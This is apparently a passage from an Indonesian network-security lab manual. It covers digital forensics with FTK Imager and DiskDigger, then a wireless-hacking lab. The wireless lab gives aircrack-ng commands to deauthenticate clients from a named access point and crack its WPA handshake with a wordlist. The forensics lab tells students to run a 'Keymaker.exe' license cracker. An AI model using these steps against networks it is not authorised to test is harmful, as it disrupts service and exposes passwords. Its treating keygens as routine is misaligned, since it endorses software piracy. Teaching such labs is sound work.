11.3 Dasar Teori 11.3.1 Pendahuluan Kemajuan teknologi dan industri yang merupakan hasil dari budaya manusia disamping membawa dampak positif, dalam arti dapat didayagunakan untuk kepentingan umat manusia juga membawa dampak negatif terhadap perkembangan dan peradaban manusia itu sendiri. Dampak negatif yang dimaksud adalah berkaitan dengan dunia kejahatan. Semakin maju kehidupan masyarakat, maka kejahatan juga ikut semakin maju. Kejahatan juga menjadi sebagian dari hasil budaya itu sendiri. Hal ini berarti bahwa semakin tinggi tingkat budaya dan semakin modern suatu bangsa, maka semakin modern pula kejahatan itu dalam bentuk, sifat dan cara pelaksanaannya. Secara garis besar, kejahatan yang berkaitan dengan teknologi informasi dapat dibagi menjadi dua bagian besar. Pertama, kejahatan yang bertujuan merusak atau menyerang sistem atau jaringan komputer. Dan kedua, kejahatan yang menggunakan komputer atau internet sebagai alat bantu dalam melancarkan kejahatan. Namun begitu, mengingat teknologi informasi merupakan konvergensi telekomunikasi, komputer dan media, kejahatan ini berkembang menjadi lebih luas lagi.



Keamanan Jaringan | 2018



87



Dalam catatan beberapa literatur dan situs-situs yang mengetengahkan cybercrime, terdapat berpuluh jenis kejahatan yang berkaitan dengan dunia cyber. Yang masuk dalam kategori kejahatan umum yang difasilitasi teknologi informasi antara lain penipuan kartu kredit, penipuan bursa efek, penipuan perbankan, perdagangan narkoba, serta terorisme. Sedang kejahatan yang menjadikan sistem dan fasilitas TI (teknologi informasi) sebagai sasaran diantaranya adalah denial of service attack (DOS), defacing ataupun cracking. Berdasarkan fungsi sistem komputer sebagai penyedia informasi, ancaman terhadap sistem komputer dikategorikan menjadi empat yaitu: 1. Interruption, merupakan suatu ancaman terhadap avaibility, informasi atau data dalam komputer dirusak, dihapus, sehingga jika dibutuhkan sudah tidak ada lagi. 2. Interception, merupakan ancaman terhadap kerahasiaan (secrecy), informasi yang ada didalam sistem disadap oleh orang yang tidak berhak. 3. Modification, merupakan ancaman terhadap integritas. Orang yang tidak berhak berhasil menyadap lalu lintas informasi yang sedang dikirim lalu mengubahnya sesuai keinginannya. 4. Fabrication, merupakan ancaman ancaman terhadap integritas. Orang yang tidak berhak berhasil meniru atau memalsukan suatu informasi sehingga orang yang menerima informasi menyangka informasi tersebut berasal dari orang yang dikehendaki oleh si penerima informasi tersebut.



Keamanan Jaringan | 2018



88



Gambar 11.1 Ancaman Terhadap Sistem Komputer Dengan meningkatnya kejahatan berbasis teknologi dalam berbagai modus sebagaimana disebutkan diatas, maka diperlukan suatu mekanisme ilmiah untuk menganalisa dan menelusuri bukti-bukti digital yang ada baik yang disimpan maupun yang ditransmisikan melalui komputer atau perangkat digital lainnya. Kejahatan computer (cybercrime) tidak mengenal batas geografis, aktivitas ini bisa dilakukan dari jarak dekat, ataupun dari jarak ribuan kilometer dengan hasil yang serupa. Penjahat biasanya selangkah lebih maju dari penegak hukum, dalam melindungi diri dan menghancurkan barang bukti. Untuk itu tugas ahli digital forensik untuk menegakkan hukum dengan mengamankan barang bukti, rekonstruksi kejahatan, dan menjamin jika bukti yang dikumpulkan itu akan berguna di persidangan. Bagaimanapun, digital forensik banyak dibutuhkan dalam berbagai keperluan, bukan hanya pada kasus-kasus kriminal yang melibatkan hukum. Secara umum kebutuhan digital forensik dapat diklasifikasikan sebagai berikut: 1. Keperluan investigasi tindak kriminal dan perkara pelanggaran hukum. 2. Rekonstruksi duduk perkara insiden keamanan komputer. 3. Upaya-upaya pemulihan kerusakan sistem. 4. Troubleshooting yang melibatkan hardware maupun software.



Keamanan Jaringan | 2018



89



11.3.2 Digital Forensik Digital Forensik adalah penggunaan teknik analisis dan investigasi untuk mengidentifikasi, mengumpulkan, memeriksa dan menyimpan bukti/informasi yang secara magnetis tersimpan/disandikan pada komputer atau media penyimpanan digital sebagai alat bukti dalam mengungkap kasus kejahatan yang dapat dipertanggungjawabkan secara hukum.



11.3.3 Komponen Digital Forensik Komponen pada digital forensik pada umumnya hampir sama dengan bidang



yang



lain.



Komponen



ini



mencakup



manusia



(people),



perangkat/peralatan (equipment) dan aturan (protocol) yang dirangkai, dikelola dan diberdayakan sedemikian rupa dalam upaya mencapai tujuan akhir dengan segala kelayakan dan kualitas sebagaimana bisa dilihat pada gambar berikut:



Gambar 11.2 Komponen Digital Forensik Manusia yang diperlukan dalam komputer forensik merupakan pelaku yang tentunya mempunyai kualifikasi tertentu untuk mencapai kualitas yang diinginkan. Belajar forensik tidak sama dengan menjadi ahli dalam bidang forensik. Dibutuhkan lebih dari sekedar pengetahuan umum tentang komputer, tetapi juga pengalaman (experience) disamping berbagai pelatihan (training) pada materi-materi digital forensic yang telah ditempuh dan dibuktikan dengan sertifikat-sertifikat pendukung.



Keamanan Jaringan | 2018



90



Ada tiga kelompok sebagai pelaku digital forensic : 1. Collection Specialist, yang bertugas mengumpulkan barang bukti berupa digital evidence. 2. Examiner, tingkatan ini hanya memiliki kemampuan sebagai penguji terhadap media dan mengekstrak data. 3. Investigator, tingkatan ini sudah masuk kedalam tingkatan ahli atau sebagai penyidik.



11.3.4 Tahapan pada Digital Forensik Ada berbagai tahapan pada proses implementasi digital forensik. Secara garis besar dapat diklasifikasikan kepada empat tahapan, yaitu : 1. Identifikasi bukti digital 2. Penyimpanan bukti digital 3. Analisa bukti digital 4. Presentasi



Keempat tahapan ini secara terurut dan berkesinambungan digambarkan pada gambar berikut ini:



Gambar 11.3 Tahapan Digital Forensik



11.3.5 Indentifikasi Bukti Digital Pada tahap ini segala bukti-bukti yang mendukung penyelidikan dikumpulkan. Penyelidikan dimulai dari identifikasi dimana bukti itu berada,



Keamanan Jaringan | 2018



91



dimana disimpan, dan bagaimana penyimpanannya untuk mempermudah penyelidikan. Media digital yang bisa dijadikan sebagai barang bukti mencakup sebuah sistem komputer, media penyimpanan (seperti flashdisk, pen drive, hard disk, atau CD-ROM), PDA, handphone, smart card, sms, e-mail, cookies, source code, windows registry, web browser bookmark, chat log, dokumen, log file, atau bahkan sederetan paket yang berpindah dalam jaringan komputer. Tahapan ini merupakan tahapan yang sangat menentukan karena buktibukti yang didapatkan akan sangat mendukung penyelidikan untuk mengajukan seseorang ke pengadilan dan diproses sesuai hukum hingga akhirnya dijebloskan ke tahanan. Penelusuran bisa dilakukan untuk sekedar mencari "ada informasi apa disini?" sampai serinci pada "apa urutan peristiwa yang menyebabkan terjadinya situasi terkini?". Forensik pada dasarnya adalah pekerjaan identifikasi sampai dengan muncul hipotesa yang teratur menurut urutan waktu. Sangat tidak mungkin forensik dimulai dengan munculnya hipotesa tanpa ada penelitian yang mendalam berdasarkan buktibukti yang ada. Dalam kaitan ini pada digital forensik dikenal istilah chain of custody dan rules of evidence. Chain of custody artinya pemeliharaan dengan meminimalisir kerusakan yang diakibatkan karena investigasi. Tujuan dari chain of custody adalah: • Menjamin bahwa bukti itu benar-benar masih asli (authentic). • Pada saat persidangan, bukti masih bisa dikatan seperti pada saat ditemukan karena biasanya jarak antara penyidikan dan persidangan relatif lama.



Beberapa hal yang menjadi pertimbangan sesuai dengan aturan chain of custody ini adalah: 1. Siapa yang mengumpulkan bukti? 2. Bagaimana dan dimana? 3. Siapa yang memiliki bukti tersebut? 4. Bagaimana penyimpanan dan pemeliharaan bukti itu?



Keamanan Jaringan | 2018



92



Lalu sebagai alternatif penyelesaian ada beberapa cara yang bisa dilakukan, yaitu: 1. Gunakan catatan yang lengkap mengenai keluar-masuk bukti dari penyimpanan. 2. Simpan di tempat yang dianggap aman. 3. Akses yang terbatas dalam tempat penyimpanan. 4. Catat siapa saja yang dapat mengakses bukti tersebut. 5. Sedangkan rules of evidence artinya pengaturan barang bukti dimana barang bukti harus memiliki keterkaitan dengan kasus yang diinvestigasi dan memiliki kriteria sebagai berikut: a.



Layak dan dapat diterima (Admissible). Artinya barang bukti yang diajukan harus dapat diterima dan digunakan demi hukum, mulai dari kepentingan penyidikan sampai ke pengadilan.



b. Asli (Authentic). Barang bukti harus mempunyai hubungan keterkaitan yang jelas secara hokum dengan kasus yang diselidiki dan bukan rekayasa. c. Akurat (Accurate) Barang bukti harus akurat dan dapat dipercaya. d. Lengkap (Complete). Bukti dapat dikatakan lengkap jika didalamnya terdapat petunjukpetunjuk yang lengkap dan terperinci dalam membantu proses investigasi.



11.3.6 Penyimpanan Bukti Digital Tahapan ini mencakup penyimpanan dan penyiapan bukti-bukti yang ada, termasuk melindungi bukti-bukti dari kerusakan, perubahan dan penghilangan oleh pihak-pihak tertentu. Bukti harus benar-benar steril artinya belum mengalami proses apapun ketika diserahkan kepada ahli digital forensik untuk diteliti. Karena bukti digital bersifat sementara (volatile), mudah rusak, berubah dan hilang, maka pengetahuan yang mendalam dari seorang ahli digital forensik mutlak diperlukan. Kesalahan kecil pada penanganan bukti digital dapat



Keamanan Jaringan | 2018



93



membuat barang bukti digital tidak diakui di pengadilan. Bahkan menghidupkan dan mematikan komputer dengan tidak hati-hati bisa saja merusak/merubah barang bukti tersebut.



11.3.7 Analisa Bukti Digital Tahapan ini dilaksanakan dengan melakukan analisa secara mendalam terhadap bukti-bukti yang ada. Bukti yang telah didapatkan perlu di-explore kembali kedalam sejumlah skenario yang berhubungan dengan tindak pengusutan, seperti: 1.



Siapa yang telah melakukan



2.



Apa yang telah dilakukan



3.



Apa saja software yang digunakan



4.



Hasil proses apa yang dihasilkan



5.



Waktu melakukan



Penelusuran bisa dilakukan pada data-data sebagai berikut: alamat URL yang telah dikunjungi, pesan e-mail atau kumpulan alamat e-mail yang terdaftar, program word processing atau format ekstensi yang dipakai, dokumen spreedsheat yang dipakai, format gambar yang dipakai apabila ditemukan, filefile yang dihapus maupun diformat, password, registry windows, hidden files, log event viewers, dan log application. Termasuk juga pengecekan pada metadata. Kebanyakan file mempunyai metadata yang berisi informasi yang ditambahkan mengenai file tersebut seperti computer name, total edit time, jumlah editing session, dimana dicetak, berapa kali terjadi penyimpanan (saving), tanggal dan waktu modifikasi. Selanjutnya melakukan recovery dengan mengembalikan file dan folder yang terhapus, unformat drive, membuat ulang partisi, mengembalikan password, merekonstruksi ulang halaman web yang pernah dikunjungi, mengembalikan email-email yang terhapus dan seterusnya.



Keamanan Jaringan | 2018



94



11.3.8 Presentasi Presentasi dilakukan dengan menyajikan dan menguraikan secara detail laporan penyelidikan dengan bukti-bukti yang sudah dianalisa secara mendalam dan dapat dipertanggung jawabkan secara hukum di pengadilan. Laporan yang disajikan harus di cross-check langsung dengan saksi yang ada, baik saksi yang terlibat langsung maupun tidak langsung. Hasil laporan akan sangat menentukan dalam menetapkan seseorang bersalah atau tidak sehingga harus dipastikan bahwa laporan yang disajikan benar-benar akurat, teruji, dan terbukti. Beberapa



hal



penting



yang



perlu



dicantumkan



pada



saat



presentasi/panyajian laporan ini, antara lain: 1. Tanggal dan waktu terjadinya pelanggaran 2. Tanggal dan waktu pada saat investigasi 3. Permasalahan yang terjadi 4. Masa berlaku analisa laporan 5. Penemuan bukti yang berharga (pada laporan akhir penemuan ini sangat ditekankan sebagai bukti penting proses penyidikan). 6. Teknik khusus yang digunakan, contoh: password cracker Bantuan pihak lain (pihak ketiga)



11.4 Langkah-Langkah Praktikum 11.4.1 Membuat Imager menggunakan FTK Imager 1.



Buka “FTK Imager.exe” dengan menggunakan Run as administrator.



2.



Untuk membuat Imager pada FTK Imager, klik File >> Create disk image pada bagian kanan atas pada FTK Imager. Dalam langkah ini “Create disk



Keamanan Jaringan | 2018



95



image” berfungsi untuk memilih salah satu memori dan membuatnya sebagai image.



3.



Setelah itu akan tampil kolom yang menanyakan Select Source dan pilih Logical Drive kemudian klik Next. Dengan memilih Logical Drive kita akan membuat suatu image dengan menggunakan memori Logical. Kemudian pilih memori yang akan di buat Image dan klik finish. Setelah mengklik finish kemudian akan muncul tampilan seperti dibawah ini.



4.



Langkah selanjutnya adalah memilih lokasi penyimpanan file untuk image dari Flash Disk yang akan kita buat, klik Add >> pilih Raw (dd) >> Next setelah itu akan muncul tampilan “Evidence Item Information” yang berfungsi untuk menambahkan informasi pada suatu image yang akan kita buat. Untuk kolom Case Number berfungsi untuk menentukan nomor kasus, Untuk Evience Number berfungsi untuk menambahkan suatu tanggal pada image, untuk Unique Description berfungsi untuk menambahkan Suatu Keamanan Jaringan | 2018



96



Deskripsi, untuk Examiner menambahkan informasi berupa nama pemilik Flashdisk atau lainnya, untuk Notes berfungsi untuk menambahkan suatu Note pada Image yang akan kita buat, setelah mengisi semua informasi klik Next.



5.



Pilih browse untuk menentukan lokasi penyimpanan, dan beri nama pada kolom “Image Filename” dan pada “Image Fragment Size” buat menjadi 0 MB lalu klik Finish.



6.



Pilih Start untuk memulai proses pembuatan Image. Lama tidak suatu proses pembuatan Image-nya tergantung pada besar memori pada Flash Disk.



Keamanan Jaringan | 2018



97



7.



Pilih Image Summary pada hasil forensic untuk melihat informasi pada Image yang kita buat.



8.



Copy hasil image tersebut yang berada pada folder yang telah kalian tentukan menjadi 2 agar file yang telah di image tidak rusak saat kita melakukan proses lebih lanjut.



Keamanan Jaringan | 2018



98



11.4.2 Proses Mounting Menggunakan FTK Imager 1. Pilih File >> Image Mounting



2. Pilih File yang telah dicopy, setelah itu Mount.



3. Jika sudah di Mount maka akan terlihat kita mengkloning memori pada Flash Disk dan membuatnya sebagai Physical Drive yang baru.



Keamanan Jaringan | 2018



99



4. Eject Flash Disk yang telah di Image dan Mount. Buka Software “Disk Digger” dengan menggunakan Run As Administrator.



5. Pilih Drive yang merupakan hasil Mount dari FTK Imager lalu Next.



6. Pilih Dig Deeper agar dapat menscan lebih jauh, atau lebih dalam lalu Next.



Keamanan Jaringan | 2018



100



7. Pilih dan centang sesuai kebutuhan, untuk mengembalikan jenis – jenis File yang telah dihapus lalu Next dan tunggu hingga proses Scanning selesai. Lama suatu proses Scanning bergantung pada Size memori.



8. Jika sudah selesai maka anda dapat melihat file- file yang telah kembali yang telah lama terhapus atau terformat.



Keamanan Jaringan | 2018



101



9. Untuk mengembalikan File, pilih salah satu File lalu klik Recover selected file, dan pilih lokasi untuk penyimpanan File yang ingin dikembalikan.



10. Jika diminta License jalanka program “Keymaker.exe” dan klik copy dan masukkan kedalam kolom untuk membuka Registernya. 11. File yang terhapus atau terformat pun kini dapat telah kembali.



Keamanan Jaringan | 2018



102



MODUL 12 WIRELESS HACKING 12.1 Tujuan Praktikum 1. Praktikan dapat memahami konsep dasar dari Wireless hacking 2. Praktikan dapat mengetahui instalasi dan konfigurasi dari aircrack-ng 3. Praktikan dapat menggunakan software aircrack-ng pada jaringan wireless 12.2 Alat yang Digunakan 1. OS Ubuntu 12.04 2. Access Point 3. PC Client 4. Aircrack-ng 1.1 5. Wordlist Dictionary



12.3 Dasar Teori 12.3.1 Pengertian Wireless Wireless adalah teknologi elektronika yang berkerja tanpa kabel. Teknologi wireless juga dapat digunakan untuk komunikasi dan pengontrolan misalnya pada penggunaan untuk komunikasi dikenal dengan istilah wireless communication. Kelebihan dari teknologi wireless : • Mobilitas, Dapat digunakan kapan saja dan dimana saja. • Kecepatan instalasi, proses pemasangan yang cepat. • Jangkauan yang luas. • Mudah & Murah. Kekurangan dari teknologi wireless : • Transmit data kecil disbanding dengan kabel • Mudah terjadi gangguan terutama pada cuaca dan bangunan • Keamanan data kurang terjamin • Intermittence (Sinyal putus-putus)



Keamanan Jaringan | 2018



103



12.3.2 WLAN Jaringan lokal tanpa kabel atau WLAN adalah suatu jaringan area lokal tanpa kabel dimana media transmisinya menggunakan frekuensi radio (RF) dan infrared (IR), untuk memberi sebuah koneksi jaringan ke seluruh pengguna dalam area disekitarnya. Peranti yang umumnya digunakan untuk jaringan WLAN termasuk di dalamnya adalah PC, Laptop, PDA, telepon seluler, dan lain sebagainya.



12.3.3 WiFi (Wireless Fidelity) Yang memiliki pengertian yaitu sekumpulan standar yang digunakan untuk Jaringan Lokal Nirkabel (Wireless Local Area Networks - WLAN) yang didasari pada spesifikasi IEEE 802.11. Standar terbaru dari spesifikasi 802.11a atau b, seperti 802.11g, saat ini sedang dalam penyusunan, spesifikasi terbaru tersebut menawarkan banyak peningkatan mulai dari luas cakupan yang lebih jauh hingga kecepatan transfernya. SPESIFIKASI



KECEPATAN



FREKUENSI BAND



802.11b



11 MB/s



~2,4 GHz



802.11a



54 MB/s



~5 GHz



802.11g



54 MB/s



~2,4 GHz



802.11n



100 MB/s



~2,4 GHz



12.3.4 Keamanan Pada WLAN Sistem keamanan pada wifi terdiri dari beberapa macam yaitu sebagai berikut : a.



WEP WEP merupakan jenis tertua dan paling rawan terkena serangan keamanan. Namanya tersebut merupakan singkatan dari “Wired Equivalent Privacy”. Saat ini membobol WEP pasword merupakan hal yang sangat mudah dilakukan. Oleh karena itu, jenis enkripsi WEP hanya akan mampu



Keamanan Jaringan | 2018



104



mencegah koneksi bagi orang awam saja, karena orang yang mengerti tentang jaringan WiFi akan dengan sangat mudah membobolnya. b. WPA dan WPA2 WPA merupakan jenis keamanan WiFi yang lebih mutakhir. WPA merupakan singkatan dari “Wi-Fi Protected Access” dan terbagi menjadi dua versi yaitu WPA dan WPA2. WPA pada awalnya dibuat sebagai solusi sementara bagi perangkat yang hanya mendukung WEP saja. Perangkatperangkat tersebut dapat di-upgrade untuk mendukung WPA sehingga mereka akan lebih aman ketimbang menggunakan WEP. Sementara itu WPA2 merupakan versi yang lebih baru. Versi ini merupakan pilihan yang paling aman yang bisa Anda gunakan saat ini. Hampir semua perangkat wifi saat ini sudah menyediakan keamanan WPA2. c.



WPA2-Personal atau WPA2-PSK WPA2-PSK merupakan singkatan dari Pre-Shared Key, atau lebih dikenal juga dengan personal mode. Jenis ini ditujukan untuk penggunaan di dalam rumah atau perkantoran kecil. Cara setting jenis ini juga lebih mudah dibandingkan dengan WPA2-Enterprise. Salah satu kelemahan yang dimiliki oleh WPA2-Personal encryption adalah apssword-nya yang lemah. Pasalnya, masih banyak orang yang menggunakan password standar seperti “abcdefg”, “12345”, dan lainnya. Hal ini tentu akan memudahkan orang lain untuk membobolnya.



d. WPA2-Enterprise atau WPA2-802.1X WPA2-Enterprise atau yang disebut juga WPA2-802.1X merupakan jenis kedua dari WPA2. Istilah enterprise yang digunakan menunjukan bahwa jenis ini ditujukan untuk jaringan enterprise yang membutuhkan banyak hardware dan lebih sulit untuk diatur. Untuk menggunakan WPA2Enterprise, Anda membutuhkan sebuah RADIUS (Remote Authentication Dial In User Service) authentication server. Untuk melakukan autentikasi dengan server tersebut, berbagai EAP (Extensible Authentication Protocols) dapat digunakan. Kemudian untuk terhubung dengan jaringan ini, setiap client harus menggunakan username dan juga password.



Keamanan Jaringan | 2018



105



12.4 Langkah-Langkah Praktikum 1.



Install Aircrack-ng #add-apt-repository ppa:aking1012-com/aircrack-precise #apt-get update #apt-get install aircrack-ng



2.



Untuk melihat tipe wireless dan interface nya dapat mengetikan : #airmon-ng



Interface Wlan0 3.



Chipset Intel 3945ABG



Driver iwl3945-[phy0]



Setelah itu lakukan mode monitoring pada wifi wlan0 dengan cara: #airmon-ng start wlan0



Interface Wlan0



Chipset Intel 3945ABG



Driver iwl3945-[phy0] (monitor mode enabled mon0)



Keterangan : nama monitor mode yaitu mon0 4.



Selanjutnya lakukan mode scanning untuk mencari wireless access point : #airodump-ng mon0



Maka akan muncul :



Keterangan: • BSSID : Nama MAC wifi • PWR : Kekuatan sinyal • #Data : Jumlah data yang masuk pada wifi • #/S : Data yang diterima setiap detiknya • CH : channel wifi • ENC : security Wifi • AUTH : autentifikasi



Keamanan Jaringan | 2018



106



• 5.



ESSID : Nama dari wireless wifi



Selanjutnya memilih target dari wifi. Disini yang akan menjadi target yaitu “WOW” #airodump-ng –c 2 –bssid E8:DE:27:F1:7F:38 –w praktikum mon0



Keterangan: -c (channel wifi) -bssid (mac address target) -w (tempat menyimpan hasil scanning) Maka akan muncul:



6.



Selanjutnya buka terminal baru untuk dilakukan proses pemutusan jaringan pada wifi. Karena wifi hanya dapat di hack dalam keadaan association (ketika client sedang mencoba untuk menyambung ke wifi). Caranya dengan mengetikan : #aireplay-ng –-deauth 100 -a E8:DE:27:F1:7F:38 mon0



Keterangan: -a (singkatan jalur akses) --deauth 100 (paket deauthentication yang dikirim 100 kali)



Keamanan Jaringan | 2018



107



Maka akan muncul:



7.



Langkah selanjutnya adalah membaca WPA handshake dengan wordlist yang sudah di download. Dengan mengetikan: #aircrack-ng praktikum*.cap-w /home/”user”/Aircrack/wordlist.txt



Keterangan: - Praktikum*.cap (tempat menyimpan hasil scanning WPA handshake) - -w /home/…….. (lokasi tempat menyimpan wordlist.txt)



Keamanan Jaringan | 2018



108



Jika berhasil maka akan muncul seperti ini:



Keterangan: - Keyfound adalah password dari Access Point yang sudah ditemukan. 8.



Waktu yang diperlukan untuk memecahkan password tergantung kepada kecepatan prosesor dan wordlist yang dimiliki.



Keamanan Jaringan | 2018



109



MODUL 13 UJI KOMPETENSI PRAKTIKUM 3 - KEAMANAN JARINGAN 13.1 Metasploit 1.



Backdoor-ing target



2.



Setting modul exploit



3.



Setting payload



4.



Setting RHOST/ LPORT (jika diperlukan)



5.



Setting LHOST/ LHOST (jika diperlukan)



6.



Exploitasi Target



13.2 Pengantar Digital Forensik 1. Dasar-dasar teknologi digital 2. Jenis-jenis data digital 3. Resiko penggunaan data digital 4. Forensic data digital 5. Anti forensic data digital



13.3 Wireless Hacking 1. Airodump-ng 2. Aireplay-ng



Keamanan Jaringan | 2018



110



MODUL 14 UJI KOMPETENSI TEORI 3 - KEAMANAN JARINGAN 14.1 System Penetration 1. System penetration 2. many attack vectors 3. understanding software exploitation attacks 4. understanding exploits 5. understanding payloads 6. metasploit framework.



14.2 Pengantar Digital Forensik 1. Dasar-dasar teknologi digital 2. Jenis-jenis data digital 3. Resiko penggunaan data digital 4. Forensic data digital 5. Anti forensic data digital



14.3 Wireless Hacking 1. Wardriving tools 2. Netstumbler 3. Kismet 4. Akses Point Channel Detected 5. Hide SSID 6. WEP 7. WPA



Keamanan Jaringan | 2018



111



DAFTAR PUSTAKA



[1]



Modul Praktikum Keamanan Jaringan 2014



[2]



Modul Praktikum Keamanan Jaringan 2016



Keamanan Jaringan | 2018



112